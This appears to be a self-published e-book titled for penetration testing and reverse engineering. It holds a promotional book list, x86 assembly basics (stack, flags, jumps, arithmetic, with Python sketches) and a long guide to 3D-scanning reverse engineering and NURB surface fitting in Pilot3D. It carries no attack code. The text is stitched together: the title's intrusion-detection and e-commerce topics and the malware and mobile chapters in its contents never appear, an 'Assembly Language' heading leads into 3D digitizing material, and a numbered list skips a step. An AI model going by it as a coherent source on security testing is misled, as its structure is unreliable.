Penetration Testing and Reverse Engineering - Intrusion Detection Systems and E-Commerce Websites
Rob Kowalski
Copyright 2016 by Rob Kowalski
http://www.esdcloudmedia.com
About The Author
Available on Amazon:
The Future UI/UX: From The Ground Up, Kate Owen
Paperback Edition:
http://www.amazon.com/Future-UI-UX-Ground-Up/dp/153956293X
Magento 2.1 EE Certification Guide
Paperback Edition:
http://www.amazon.com/Magento-2-1-EE-Certification-Guide/dp/1539945065
The Complete Men's Health Plan
Paperback Edition:
http://www.amazon.com/Complete-Mens-Health-Plan-Programs/dp/1539701093
Kindle Edition:
http://www.amazon.com/dp/B01J79NR72
The Future Javascript: Object Orientated Programming And
Beyond, Dr. Sergio Grisedale
Kindle Edition:
http://www.amazon.com/dp/B018CLL1II
Creating Web Applications On The Go, Frank Winchester
Paperback Edition:
http://www.amazon.com/Creating-Web-Applications-Frank-Winchester/dp/153954592X
Kindle Edition:
http://www.amazon.com/dp/B01GX0PNPW
The Future SEO: For Your E-Commerce Website, James
King
Paperback Edition:
https://www.amazon.com/Future-SEO-Your-Ecommerce-Website/dp/1539565203
Kindle Edition:
http://www.amazon.com/dp/B019L86H0S
Wordpress Security Essentials: For Webtrepreneurs, Web
Designers And Information Security Professionals, James King
Paperback Edition:
http://www.amazon.com/Wordpress-Security-Essentials-Webtrepreneurs-Professionals/dp/1539563162
Kindle Edition:
http://www.amazon.com/dp/B01GOQ7UIS
The Complete Pinterest, J Lane
Paperback Edition:
http://www.amazon.com/Complete-Pinterest-Your-Hobbies-Business/dp/1539579751
Kindle Edition:
http://www.amazon.com/dp/B00NFRLJ46
About The Author
Introduction
Why Reverse Engineer?
An Overview of Reverse Engineering
Delving Deeper
Applied Reverse Engineering
Reverse Engineering And Assembly Code
A Methodology for Reverse Engineering
The Three Step Model
Assembly Language
3D Modeling Or Application Software
Reverse Engineering Using Pilot3D
Reverse Engineering iPhone Applications
Reverse Engineering Integral iOS Applications
Reverse Engineering Android Applications
Data Types
Malware Analysis
Reverse Engineering Linux Malware
Introduction
Reverse engineering has its origins in the analysis of hardware for commercial or military advantage. The purpose is to deduce design decisions from end products with little or no additional knowledge about the procedures involved in the original production. The same techniques are now being applied to legacy software systems, not for industrial or defence ends, but rather to replace incorrect, incomplete, or otherwise unavailable documentation.
Why Reverse Engineer?
Common motivations include:
- Interoperability.
- Security auditing.
- Curiosity.
The following chapters explain the low-level architecture of Windows and Linux to a depth that will enable you to reverse engineer software, as I will show later on.
Delving Deeper
In the world of reverse engineering, we often hear about black box testing. Even though the tester may have an API, the ultimate goal is to find the bugs by hitting the product hard from the outside. Apart from this, the main purposes of reverse engineering are to audit security, remove copy protection, customize embedded systems, and add features without spending much, among other similar activities.
Where is Reverse Engineering Used?
Recent legal moves backed by many large software and hardware makers, as
well as the entertainment industry, are eroding companies' ability to do
reverse-engineering.
"Reverse-engineering is legal, but there are two main areas in which we're
seeing threats to reverse-engineering," says Jennifer Granick, director of the
law and technology clinic at Stanford Law School in Palo Alto, Calif. One
threat, as yet untested in the courts, comes from shrink-wrap licenses that
explicitly prohibit anyone who opens or uses the software from reverse-
engineering it, she says.
The other threat is from the Digital Millennium Copyright Act (DMCA), which
prohibits the creation or dissemination of tools or information that could be
used to break technological safeguards that protect software from being
copied. Last July, on the basis of this law, San Jose-based Adobe Systems Inc.
asked the FBI to arrest Dmitry Sklyarov, a Russian programmer, when he was
in the U.S. for a conference. Sklyarov had worked on software that cracked
Adobe's e-book file encryption.
The Stack
The stack is a memory area that holds temporary data (function parameters, local variables, etc.) and is designed to behave in a Last In, First Out (LIFO) manner, which means the first value stored in the stack (or pile) will be the last one out. The example always given to explain how the stack works is a pile of plates stacked up to be washed: the last plate to be stacked will be the first to be washed.
To be able to push data onto the stack and pop data from it, x86 assembly
uses the instructions PUSH and POP.
Push Instruction
PUSH decrements the stack pointer (SP, or ESP in 32-bit code) and then stores a value at the new top of the stack.
PUSH AX
PUSH BX
PUSH 1986
First AX is pushed onto the stack, then BX, then the value 1986; because the stack is LIFO, it's 1986 that will be popped first.
Pop Instruction
POP loads the value stored at the location pointed to by the stack pointer into its operand, then increments the stack pointer.
POP AX
POP BX
Assuming AX = 1 and BX = 2 were pushed in that order, the topmost element, the old value of BX (2), is popped into AX. Then BX receives 1, the old value of AX; the two registers have been swapped, and the stack is now empty.
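To make the mechanics concrete, here is a minimal Python sketch that models how PUSH and POP move the stack pointer; the memory layout and initial SP value are illustrative assumptions, not how any particular program lays out its stack.

# The x86 stack grows downward: PUSH decrements SP before storing,
# POP reads the top of the stack and then increments SP.
memory = {}            # sparse "RAM": address -> 16-bit value
SP = 0x1000            # illustrative initial stack pointer

def push(value):
    global SP
    SP -= 2                        # make room for a 16-bit word
    memory[SP] = value & 0xFFFF    # store at the new top of stack

def pop():
    global SP
    value = memory[SP]             # read the current top of stack
    SP += 2                        # release the slot
    return value

push(1)        # PUSH AX (AX = 1)
push(2)        # PUSH BX (BX = 2)
ax = pop()     # POP AX -> AX = 2 (last in, first out)
bx = pop()     # POP BX -> BX = 1
print(ax, bx)  # prints: 2 1 -- the values have been swapped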
Flags
Flags are indicators that many instructions can alter; they describe the results of logical, arithmetic, and comparison instructions. The flags are grouped together in the FLAGS register, a 16-bit register (extended to 32 bits as EFLAGS).
1. Bit 0: CF
2. Bit 1: 1 < Reserved
3. Bit 2: PF
4. Bit 3: 0 < Reserved
5. Bit 4: AF
6. Bit 5: 0 < Reserved
7. Bit 6: ZF
8. Bit 7: SF
9. Bit 8: TF
10. Bit 9: IF
11. Bit 10: DF
12. Bit 11: OF
13. Bits 12-13: IOPL
14. Bit 14: NT
15. Bit 15: 0 < Reserved
16. Bit 16: RF (EFLAGS only)
17. Bit 17: VM (EFLAGS only)
The marked bits represent widely used flags, and they behave as follows:
CF Carry Flag: affected by the result of arithmetic
instructions, used to indicate when an arithmetic carry or borrow has
been generated out of the most significant ALU bit position. (Wikipedia)
PF Parity Flag: takes the value 1 if the number of set bits in the low byte of a result is even.
AF Auxiliary Flag (or Adjust Flag): indicates when an
arithmetic carry or borrow has been generated out of the 4 least
significant bits. (Wikipedia)
ZF Zero Flag: used to check the result of arithmetic
operations. If an operand result is equal to 0, ZF takes the value 1, used
frequently to compare the result of a subtraction.
SF Sign Flag: takes the value 1 if the result of the last mathematical operation is negative, i.e. its most significant (sign) bit is set.
IF Interrupt Flag: by taking the value 1, IF lets the CPU
handle hardware interrupts, if set to 0, the CPU will ignore such
interrupts.
DF Direction Flag: controls the direction of pointers
movement (on strings processing for example, left to right / right to left.)
OF Overflow Flag: indicates if an overflow occurred
during an operation and may also be used to correct some mathematical
operation errors in case of overflows (if overflow, OF takes the value 1).
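To tie these definitions together, here is a rough Python sketch that computes the common flags for an 8-bit subtraction, the operation CMP performs internally. It is a simplification for illustration, not a complete model of the CPU.

def sub_flags(a, b, bits=8):
    # Compute CF, ZF, SF, PF and OF for a - b on bits-wide operands.
    mask = (1 << bits) - 1
    result = (a - b) & mask
    cf = 1 if (a & mask) < (b & mask) else 0   # unsigned borrow occurred
    zf = 1 if result == 0 else 0               # result is zero
    sf = (result >> (bits - 1)) & 1            # sign bit of the result
    pf = 1 if bin(result & 0xFF).count("1") % 2 == 0 else 0  # even parity, low byte
    # Signed overflow: operand signs differ and the result's sign
    # differs from the first operand's sign.
    sa = (a >> (bits - 1)) & 1
    sb = (b >> (bits - 1)) & 1
    of = 1 if (sa != sb) and (sf != sa) else 0
    return {"CF": cf, "ZF": zf, "SF": sf, "PF": pf, "OF": of}

print(sub_flags(5, 5))  # ZF = 1: equal operands
print(sub_flags(3, 5))  # CF = 1, SF = 1: borrow, negative result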
Flags are directly related to conditional statements, which leads us to
introduce conditional jumps before talking about comparisons.
Conditional jumps
We are about to discuss an interesting topic, insofar as it helps in understanding how a program reacts to the result (1 or 0 in the flags) of most operations. Whether a jump is taken or not is decided by tests or comparisons made with instructions like:
CMP instruction
CMP compares two operands but does not store a result. Using this instruction, the program tests two values by subtracting the second operand from the first, and depending on the outcome it changes the flags (the flags affected are OF, SF, ZF, AF, PF, and CF). For instance, if the two given values are equal, the Zero Flag holds the value 1; otherwise it holds 0. CMP can be compared to SUB, the subtraction instruction, except that CMP discards the result.
CMP AX, BX
Here CMP computes AX - BX. If the result of this subtraction is equal to zero, then AX is equal to BX, and this affects ZF by changing its value to 1.
To make it easier, jumps are TAKEN when:
Result is bigger than (unsigned numbers) -> JA
Result is lower than (unsigned numbers) -> JB
Result is bigger than (signed numbers) -> JG
Result is lower than (signed numbers) -> JL
Equality (signed and unsigned numbers) -> JE or JZ
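The same bit pattern can therefore satisfy different jumps depending on whether it is interpreted as signed or unsigned. The following Python sketch (an 8-bit width is assumed purely for illustration) shows which jumps would be taken after CMP a, b:

def taken_jumps(a, b, bits=8):
    # Which conditional jumps would be taken after CMP a, b?
    mask = (1 << bits) - 1
    ua, ub = a & mask, b & mask                          # unsigned views
    sa = ua - (1 << bits) if ua >> (bits - 1) else ua    # signed reinterpretation
    sb = ub - (1 << bits) if ub >> (bits - 1) else ub
    jumps = []
    if ua > ub: jumps.append("JA")    # above (unsigned)
    if ua < ub: jumps.append("JB")    # below (unsigned)
    if sa > sb: jumps.append("JG")    # greater (signed)
    if sa < sb: jumps.append("JL")    # less (signed)
    if ua == ub: jumps.append("JE/JZ")
    return jumps

print(taken_jumps(0xFB, 0x05))  # ['JA', 'JL']: 0xFB is 251 unsigned, but -5 signed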
Mathematical instructions
MUL instruction
Very useful: for multiplication the CPU uses either the instruction MUL (for unsigned multiplication) or IMUL (for signed multiplication). It multiplies an operand (a register or a memory operand) by the AL, AX, or EAX register and stores the product in AX, DX:AX, or EDX:EAX respectively.
With AX = 3 and BX = 5
MUL BX
The product, 15, is stored in DX:AX (DX = 0, AX = 15).
IMUL instruction
It behaves in the same way as MUL, except that it is used for signed operations and preserves the sign of the product. Note that before a signed word division (see IDIV below), using the instruction CWD (convert word to doubleword) to extend the sign of AX into DX is a must to avoid mistaken results.
With AL = 5 and BL = 12
IMUL BL
The product, 60, is stored in AX.
DIV instruction
Exactly the same in form as MUL and IMUL, DIV is used for unsigned division on unsigned integers. With a word divisor, it divides DX:AX by the operand, leaving the quotient in AX and the remainder in DX.
With AX = 18 and BX = 5
DIV BX
The result will be Quotient AX = 3 and remainder DX = 3
IDIV instruction
Used for signed integer division and taking the same operands as the DIV instruction. With a byte divisor, AL must first be sign-extended into AH using the instruction CBW (convert byte to word) before executing IDIV.
With AL = -48 and BL = 5
MOV AL, -48 (puts -48 the dividend into AL)
CBW (extends AL into AH)
MOV BL, 5 (puts 5 the divisor into BL)
IDIV BL
The result will be AL=-9 and AH = -3
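One detail worth knowing: IDIV truncates the quotient toward zero, which is why -48 / 5 gives -9 remainder -3 rather than -10 remainder 2. A small Python check (Python's own // operator floors instead, so we truncate explicitly):

def idiv(dividend, divisor):
    # x86 IDIV truncates toward zero; Python's // floors, so int() is used.
    quotient = int(dividend / divisor)
    remainder = dividend - quotient * divisor
    return quotient, remainder

print(idiv(-48, 5))       # (-9, -3), matching AL = -9 and AH = -3 above
print(-48 // 5, -48 % 5)  # -10 2: Python's floor division differs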
Negative numbers
At school, when studying negative numbers, things were really easy for us, and much easier for teachers: just add a negative sign and you have your negative number! Unfortunately, things are a bit more complicated when it comes to x86 assembly code. In binary we cannot add a minus sign; there are only 0s and 1s, so negative numbers are stored in two's complement form. The method consists of:
1. Converting the number to binary.
2. Inverting the binary bits (replace 0 by 1 and 1 by 0).
3. Adding 1 to the result.
Let's take 5, for instance. Five in decimal is equivalent to 00000101 in binary (actually 101 is enough, but we need to work in 8 bits). By inverting the bits we get 11111010, and 11111010 + 1 gives 11111011. So -5 in binary is equal to 11111011.
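You can verify this in one line of Python: masking a negative number with 0xFF yields its 8-bit two's-complement bit pattern.

# Python integers are arbitrary-precision; & 0xFF keeps the low 8 bits,
# which is exactly the two's-complement representation of the number.
print(format(-5 & 0xFF, "08b"))   # prints 11111011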
Logical NOT
NOT performs a logical negation on the specified operand and puts the result in the same operand. It inverts the value of each bit: bits that equal zero become 1, and vice versa.
NOT 0 = 1
NOT 1 = 0
MOV AX, 15
MOV BX, 25
NOT AX gives AX = 11110000 (15 = 00001111)
NOT BX gives BX = 11100110 (25 = 00011001)
Logical TEST
The instruction TEST does a non-destructive AND (or a logical compare): it ANDs two operands/values and alters the flags depending on the result, without storing the result itself. If all of the corresponding bits of the two operands are equal to 0, the result is 0 and the Zero Flag is set to 1.
TEST AX, 1
If the first (lowest) bit of AX is equal to 1, the result is non-zero and the Zero Flag is set to 0; if that bit is 0, the Zero Flag is set to 1.
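Here is a short Python sketch of both operations on 8-bit values (the width is an assumption for illustration):

def not8(x):
    return ~x & 0xFF    # NOT: invert all 8 bits

def test_zf(a, b):
    return 1 if (a & b) == 0 else 0   # TEST: AND the operands, keep only ZF

print(format(not8(15), "08b"))   # 11110000, as in the NOT AX example
print(format(not8(25), "08b"))   # 11100110, as in the NOT BX example
print(test_zf(0b1010, 1))        # 1: lowest bit clear, so ZF = 1
print(test_zf(0b1011, 1))        # 0: lowest bit set, so ZF = 0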
When reverse engineering is used to attack or work around a patent, the typical approaches are to:
- Observe and assess the mechanisms that make the device work
- Claim that the idea is not novel and is an obvious step for anyone experienced in the particular field
- Make a subtle change and claim that the changed product is not protected by the patent

The Three Step Model
There are up to three steps in the process of reverse engineering. The first
step is to use some input device or technique to collect the raw geometry of the
object. This data is usually in the form of (x,y,z) points on the object relative
to some local coordinate system. These points may or may not be in any
particular order.
The second step is to use a computer program to read this raw point data and
to convert it into a usable form. This step is not as easy as it might seem.
The third step is to transfer the results from the reverse engineering software
into some 3D modeling or application software so that you can perform the
desired action on the geometry. Sometimes, steps 2 and 3 can be done inside
one program.
Questions
What is the size of the object you wish to digitize? This, of course, affects
the type of digitizing device you can use. Some input devices can be
repositioned to be able to handle larger objects, but you have to be concerned
about the potential loss of accuracy. Related questions are how much space
around the object do you have to work with and what are the environmental
conditions?
What level of accuracy do you need? Don't expect too much
accuracy. Although the digitizing device you use might be very accurate, you
are only collecting data at discrete points. These disjoint points must then be
curve-fit or surface-fit to create a usable 3D model. This fitting process is
where most of the accuracy errors are introduced. Even if you collect
thousands of data points on the object, you still will lose some accuracy when
the points are converted into a usable form. The accuracy of the input device
may not be the accuracy you achieve for the usable 3D computer model.
For the input devices, you also have to be careful about the accuracy figures
given. What is the best accuracy? What is the worst-case accuracy? What is
the repeatable accuracy? What is the digital accuracy (number of bits)? For
example, 2D scanners usually define both the optical resolution and the digital
resolution. The optical resolution is lower than the digital resolution, but the
devices can sometimes interpolate the raw, optical data to increase it to the full
digital resolution. The interpolated results, however, do not have the same
accuracy as a scanner that has a higher optical resolution. There can also be
other errors from other sources. If accuracy is that important to you, then you
must put the whole 3-step process to a test. Remember, however, that most of
the errors will be introduced during the conversion process from the raw data
into the usable 3D model.
What do you want to do with the data? This is perhaps the most important
question because it affects what hardware and software you need. If you
want to recreate just the basic shape of an object for use in a fast-moving,
dynamic simulation, then accuracy is not critical and you want the data size of
the final 3D model to be small. Since you won't be using the 3D model for
construction or repair purposes, you might only need a 3D polyhedron
(polygon) form. This will affect the type of software you need to convert the
raw data into a useable 3D model form. If, however, you need a very accurate
recreation of the object to perform a repair or alteration, then you will need to
convert the raw data to a different 3D modeling form, such as NURB
surfaces. If you also need to verify or prove that the final 3D computer model
is within a certain tolerance of the raw data, then you need to look for tools in
the software that make this task easier.
Generally speaking, for less accurate objects or organic objects, the goal is
to recreate the object in a 3D polygon-type form. If the object to be input is a
manufactured object with precise dimensions, then the goal is to recreate the
object using 3D NURB surfaces. NURB surfaces may also be used for less
accurate or organic objects, if the goal is to be able to perform large-scale
modifications to the object. These are not hard and fast rules, since there is a
good overlap of capability between organic, polygon or subdivision modelers
and NURB surface modelers.
Input Devices - The devices that input geometry into a computer can be
divided into two groups: 2D devices and 3D devices. The 2D input devices
consist of the following:
2D Scanners - These common devices work like digital photocopiers and are
good for small drawings or pictures. They are fast, but they only get the
drawing or picture into the computer as a matrix of color dots (a raster or
bitmap image), just like on the computer screen. The resolution might be very
high, but the raster format of the geometry may not be in a useful format. If a
drawing consists of a number of lines and curves that you want to work on or
use in some kind of 2D or 3D geometry modeling program, then you are out of
luck, unless you convert the raster image into some kind of line or vector
format. There are two ways to do this. One way is to use a raster to vector
conversion program. These programs look at the raster image and try to
connect the dots to form lines or curves that can be transferred to your design
program. As you can imagine, these raster to vector conversion programs can
get easily confused if many lines or curves cross each other on the
drawing. After this conversion, you might have to spend a lot of time in your
design program cleaning up the mess. It might be faster to use a 2D digitizer
tablet to input the data. Another way to convert the raster data to vector data is
to use a design program that can read the raster data and display the picture as
a background image. Then you can use your design program to recreate the
vector geometry by tracing over the raster image. This is kind of like doing
the digitizing right on the computer screen.
As you can probably see, there is no free lunch when it comes to getting
geometry into the computer in a usable form. If all you need to do is to scan a
drawing or photograph that you want to put on the web or into a report using a
word processor, then there is no need to convert the raster image into a vector
format. This is really not considered to be reverse engineering, however,
since you do not have to convert the raster image into a different, more usable
form.
The 3D input devices are generally broken into contact and non-contact types.
All of these input devices collect raw (x,y,z) point data on the object and
store them in a computer file in the order that they were entered. Some devices
allow you to define start and stop codes while you digitize so that you can
identify connected points on the object, like a knuckle or hard edge. You might
think of this connected string of points as a polyline on the object. Other input
devices generate semi-random sequences of points, sometimes called point-
clouds of data. As discussed later, this point input order may make an
enormous difference in what reverse engineering software you can use and
how easy it is to convert the raw point data into useable and accurate 3D
geometry. All of the input devices are more concerned with the accurate input
of 3D point positions on the object than they are with the order or sequence of
the points in the data file. It is the job of the reverse engineering software or
the 3D modeling software to construct usable geometries based on these
points. This step can be quite tedious.
Assembly Language
Once you are familiar with assembly language, you should be able to start
reverse engineering software.
Special purpose reverse engineering programs may have many tools for
performing general 3D shape manipulation, but their main focus is on the
process of converting raw point data from the input devices into a more usable
polygon or NURB surface representation with the least loss of accuracy. You
would like to think that after this process is done, the final 3D computer model
passes exactly through all of the raw input data points. This may happen for a
polygon model, but the raw data rarely ever matches the exact needs of a
NURB surface model and the accuracy is less. The following two sequences
of steps show you what you might have to go through during the reverse
engineering process. The first sequence of steps is for point clouds of raw
input data and the second sequence of steps is for raw point data that is
organized sequentially along key paths on the object.
For Point Clouds of Data
1. Read the raw point data into the program from standard DXF or IGES files.
3. For point clouds of data, you need to use a program that has the capability
to wrap the cloud of points with 3D, connected polygons. If the point cloud
covers several objects, the user of the software may have to split the point
cloud into smaller sections before using the polygon wrapping capability. You
may also need tools to align point cloud data taken from different views of the
object.
For a wrapped polygon model, you may now be finished, if all you need is a
3D polygon model of the object for very simple rendering or display
purposes. However, most users need to modify the object or need to define
colors, textures, and a variety of other attributes for the polygon model. If the
wrapping process creates too many polygons for use by your modeling or
rendering software, then the reverse engineering software should provide some
way to reduce the number of polygons used while still maintaining control over
the accuracy of the model. At this point, you may be done with the reverse
engineering software and need to transfer the polygon model to your 3D
polygon modeler for further work or analysis.
4. If you need a more accurate definition of the object using NURB surfaces,
then you have more work to do. The object, now covered in polygons, must be
skinned or fitted with NURB surfaces. NURB surfaces have many nice
properties, but their major drawback is that they are rectangular in
nature. This doesn't mean that you can't stretch them into almost any shape. It
just means that to achieve a good NURB surface fit to an object, you need to
break the digitized object into a collection of rectangular-like areas. The more
non-rectangular the areas, the less accurate the fit will be. Some reverse
engineering programs try to convert the polygon model to a NURB model
automatically and some require user guidance. This is a trade-off; the
automatic methods will generate more NURB surfaces, but the manual methods
can be quite tedious. The ideal solution would be to combine the best of both
methods. Keep in mind that this is the process where most of the accuracy
errors are created. Generally, the more NURB surfaces you fit to the polygon
mesh, the more accurate the result will be, but more surfaces mean less
controllability, which is a problem if you want to modify the model.
5. The final step is to output the NURB surfaces in an IGES file format using
either type 128 NURB surfaces or type 143 or type 144 trimmed NURB
surfaces. These are the most common formats for transferring NURB surfaces
to other programs. If you plan to transfer these NURB surfaces to another
program, make sure that it can handle the format output from your reverse
engineering software.
Digitizing
For input digitizing devices that do not generate point clouds of data
automatically, the user has much more control over the number and sequence of
input points. This allows you to reduce the number of raw data points that you
have to deal with by entering a number of specially selected sequences of
points on the object. For example, the operator might control the 3D digitizer
to first enter all of the borders or hard boundary edges of the object. If the
object consists of all flat sides, then the task would be done. If the object
consisted of curved surfaces, the operator would additionally digitize several
evenly spaced cross-sections of the object. This means that the reverse
engineering software will have to deal with this data rather than an arbitrary
point cloud of data. If this is the technique that you will be using, then you
need to know what software you will be using for the reverse engineering
process and what its requirements are.
Even though you do not generate a massive point cloud of data of the object,
you can still use those programs that process your raw point data as a point
cloud and turn it into a 3D polygon mesh. The problem is that the polygon
wrapping process does not take into account the information associated with
the sequencing of the input points. Without a massive number of points, the
polygon wrapping technique might do a poor job. If your goal is to generate
just a 3D polygon representation of the object, then you will probably have to
use a polygon wrapping technique. This section, however, will describe the
general steps required to convert these sequenced points into NURB surfaces.
First, here are a few instructions for the input digitizing process. Since you are
not generating a point cloud of data and since you want to minimize the number
of points that you have to digitize, you first need to know what data works best
when converting the raw data into NURB surfaces. As discussed above,
NURB surfaces are rectangular-like surfaces defined by a grid of points,
organized as rows and columns. Before digitizing, you need to identify how
that object will be covered with the NURB surfaces. The following steps
show this process and start before you begin digitizing your sequence of
points.
1. Before digitizing, evaluate your object to see how it can be broken into one
or more rectangular-like NURB surfaces. Identify all paths that will become
the edges of the NURB surfaces.
2. During the input process, digitize each NURB surface edge as a connected
series of points. You can think of each sequence of points as a polyline. Once
you have digitized the surface edges, you need to digitize a series of cross-
sections through what will be each NURB surface, going from surface edge to
surface edge. Digitize the cross-sections perpendicular to what will be the
two long edges of the surface. Spread the cross-sections evenly across the
surface. The more sections that you digitize, the more accurate will be the
surface fit, but there is a point of diminishing returns. For surfaces without
much curvature, use 3 to 5 cross-sections. For more complicated surfaces,
increase the number of cross-sections. These digitized boundary edges and
cross-sections will be used by the reverse engineering software or 3D
modeling software to create NURB surfaces. If you spend some time
determining how the NURB surfaces will be fitted to your object, you will
save a lot of time in the reverse engineering process and the resultant surface
fit will be very accurate.
3. Read the raw data point files into your reverse engineering or 3D modeling
software. If the surface edge and cross-section points are not pre-connected as
polyline entities, then you need to use the software to connect the points that
define the edges and cross-sections into separate polylines. You should define
the edges of each surface as a separate polyline.
4. Fit each polyline with a curve. This step may or may not be necessary. It
depends on what the software needs to create a NURB surface. Some
programs can work with polylines and some require curves.
5. Use the proper command to skin or loft a NURB surface through all of the
surface cross-sections. As part of this skinning process, you need to include
the two surface edge curves that are parallel to the cross-sections. The
accuracy of this surface skinning or fitting process depends on how you define
and orient the surface on your object and how evenly spaced are your cross-
sections.
6. Once the NURB surface has been created, you will have to compare the
resultant surface with the raw input data points. Some programs give you tools
to show locations and magnitudes of the errors. If there aren't any, then you
will have to use the program to look at the created surface from all views and
zoom in to locate any errors.
7. Repeat steps 4-6 for each surface to be constructed. As you can see, the
digitizing and reverse engineering process depends a lot on a good
understanding of NURB surfaces.
8. The final step is to output the NURB surfaces in an IGES file format using
either type 128 NURB surfaces or type 143 or type 144 trimmed NURB
surfaces. These are the most common formats for transferring NURB surfaces
to other programs. If you plan to transfer these NURB surfaces to another
program, make sure that it can handle the format output from your reverse
engineering software.
Note: If the area to be digitized is definitely not rectangular, then you will
have to either decide how the rectangular NURB surface will be distorted to
fit, or you can digitize past the edges to create a rectangular shape. If you
digitize past the desired edges, then you should still digitize the edge that you
went past. This edge will be used to trim the oversized NURB surface.
3D Modeling Or Application
Software
The purpose of reverse engineering a 3D model of an object is to do something
with the result. If the ultimate task is simply to display or render the model,
then you would probably only need a polygon model and the ultimate
application would be a rendering program. If you need to do other tasks, like
shape alteration or construction of templates for repairs, then you would
probably need a NURB surface definition and a general-purpose 3D modeling
program. Other possible tasks are things like finite element analysis (FEA) or
computational fluid dynamics (CFD) analysis. These analyses might require
only a 3D polygon model, but the polygons might have to be radically adjusted
to meet the needs of the analysis program.
Summary
The first thing you need to do is to define the accuracy you need and determine
what you want to do with the 3D model once you get it in the computer. The
next step is to select the software that will perform those tasks and determine
whether they require only a polygon model or whether they require a NURB
surface definition. Once this has been defined, you can then tackle the
selection of the input device and the reverse engineering software.
Reverse Engineering Using Pilot3D
This discussion covers manual contact input digitizing devices that generate
points in sequence under user control. These manual digitizers (not 3D
scanners that generate point clouds of data) allow you to reduce the number of
raw data points that you have to deal with by entering a number of specially
selected sequences of points on the object. However, you cannot input just any
points. You have to know what points are required by the software. For
example, the operator might control the 3D digitizer to first enter all of the
borders or hard boundary edges of the object. If the object consists of all flat
sides, then the task would be done. If the object consists of curved surfaces,
the operator would additionally digitize several evenly spaced cross-sections
of the object. The number of points that need to be digitized, the spacing of the
points and the orientation of these points greatly affect the ease and accuracy of
generating the final 3D computer model.
The problem is that NURBs are rather fussy mathematical tools. They are
rectangular in nature and behave badly if they are stretched into very odd
shapes. This means that you must look at the object you want to digitize and
determine how you can break it into one or more rectangular-like shapes. The
surfaces do not have to be perfectly rectangular. They can even be triangular
in shape by making one side of the rectangular surface zero. However, if your
surface has 5 or more sides with sharp, knuckle points along the edge, then you
will have to break the surface into multiple NURB surfaces. Either that, or you
will have to define an over-sized rectangular surface and use the actual surface
edges as trimming curves on the surface.
Another thing to keep in mind is that Pilot3D creates a NURB surface by
lofting or skinning a surface through a collection of polylines or curves. These
curves should be fairly evenly spaced and should cover the entire NURB
surface region. After you decide how the rectangular-like NURBs will fit on
your object, you need to digitize what will become the boundaries of the
NURB surfaces and then digitize a number of cross-sections over the surface,
perpendicular to the long edges of the surface.
1. Before digitizing, evaluate your object to see how it can be broken into one
or more rectangular-like NURB surfaces. Identify all paths that will become
the edges of the NURB surfaces. Then determine a number of cross-sections
over each surface perpendicular to the long edges of each surface. If desired,
you can mark the paths and cross-sections on the object before digitizing.
2. During the input process, digitize each NURB surface edge as a connected
series of points. You can think of each sequence of points as a polyline. If
your digitizer can link points together and mark them as a polyline, you should
do so. Otherwise, you will have to use Pilot3D to create polylines from the
raw point data to create the 4 surface edges and all of the cross-sections. Once
you have digitized the surface edges, you need to digitize a series of cross-
sections through what will be each NURB surface, going from surface edge to
surface edge. Digitize the cross-sections perpendicular to what will become
the two long edges of the surface. Spread the cross-sections evenly across the
surface. The more sections that you digitize, the more accurate will be the
surface fit, but there is a point of diminishing returns. For surfaces without
much curvature, use about 5 cross-sections. For more complicated surfaces or
for more accuracy, increase the number of cross-sections. These digitized
boundary edges and cross-sections will be used by Pilot3D to create NURB
surfaces. If you spend some time determining how the NURB surfaces will be
fitted to your object, you will save a lot of time in the NURB surface fitting
process and the resultant surface fit will be very accurate.
If you have to create an over-sized NURB surface because the shape that you
are digitizing is not rectangular at all, then you must digitize both the actual
surface edges and digitize the edges that will become the edges of the over-
sized NURB surface. Then you must digitize the cross-sections over the entire
over-sized NURB surface area, not just the actual surface area. The actual
surface edges will be used to trim the over-sized NURB surface to the actual
shape of the surface.
Don't be overly concerned about trying to get perfect input points because
Pilot3D can do a lot of manipulation to the raw data to get it to meet the
skinning needs of the NURB surfaces.
3. Save the digitized points in a DXF or IGES type file for reading into
Pilot3D.
4. Read the raw data point files into Pilot3D using one of the File-Data File
Input commands. If the surface edge and cross-section points are not pre-
connected as polyline entities, then you need to use the software to connect the
points that define the edges and cross-sections into separate polylines. You
should define the 4 edges of each surface as separate polylines. To create a
polyline or curve from point data in Pilot3D, use the Curve-Add Polyline or
Curve-Add Curve command. Instead of using the left mouse button to define
each point, move the cursor near each digitized point and hit the p key on the
keyboard. This tells the program to snap the input polyline or curve point to
the point nearest to the cursor. This process can be continued until a curve or
polyline is created using all of the raw data points. This is rather tedious if
you have a lot of data points; that is why creating the polylines in the
digitizing software, if it can be done, is recommended. When you
are creating each of these polylines or curves, create one for each of the 4
surface edges and one for each of the cross-sections of the surface. These
boundary edges and cross-sections are what Pilot3D uses to skin and create
NURB surfaces.
5. Fit each polyline with a curve using the Curve-Curvefit command. This
step is not required in Pilot3D for the surface skinning step, but it is a good
idea. The curves will give you an idea of how the program will fit the rows or
columns to the cross-sections. If the curvefit is bad, then you can adjust the
shape using the point editing tools to create a better fit. You can use the
original raw data points as guides to make sure that your corrections do not
stray too far from the actual shape. Now you are ready to create the NURB
surface from the cross-sections.
6. Use the Create 3D-Skin/Loft Surf command to skin or loft a NURB surface
through all of the surface cross-sections. When you select this command, the
program will prompt you to pick each cross-section, in sequence, across the
surface. Note that you should include the two surface edges that are parallel to
the cross-sections! When picking each cross-section, you need to pick each
curve near the same end. The reason for this is that the program is rather dumb
and needs you to tell it which ends of the curves should be connected
together. This may seem obvious to a human, but there are some cases that
could be quite confusing for the program to figure out automatically. After you
select all of the cross-sections (and the 2 parallel edge curves), the program
will show you a dialog box with a number of options. The important one is to
define how many rows you wish to fit through the cross-sections. The more
rows you enter, the more accurate the fit will be, but more rows will make it
more difficult to edit or smooth the surface. Smoother or simpler surfaces
require fewer rows (perhaps 5), but surfaces with more curvature require a
higher number. The accuracy of this surface skinning or fitting process
depends on how you define and orient the surface on your object and how
evenly spaced are your cross-sections.
7. Once the NURB surface has been created, you will have to compare the
resultant surface with the raw input data points. This can be done by zooming
in on the rows and columns of the surface and checking on how far the raw
data points are from the surface. If any corrections need to be made, you can
use any of the surface editing commands to create a better fit of the surface to
the data points. If you do not like how the NURB surface was created, then
you can use the Undo command and try again. Keep in mind, however, that
fitting a NURB surface to a collection of points is a difficult task, especially if
accuracy is a concern. In most cases, you will have to adjust the NURB
surface using the edit commands to get the best fit. Carefully zoom in on each
portion of each row and column and look at how closely the surface matches
the raw data points. At this point you really need to know what kind of
accuracy is needed for your task. Otherwise, you could be spending hours
trying to fix things that don't matter.
Summary
- Pilot3D uses NURB surfaces that work best when they are
rectangular in shape
- You will have to edit the fitted NURB surface until you match
the raw data within the desired tolerance
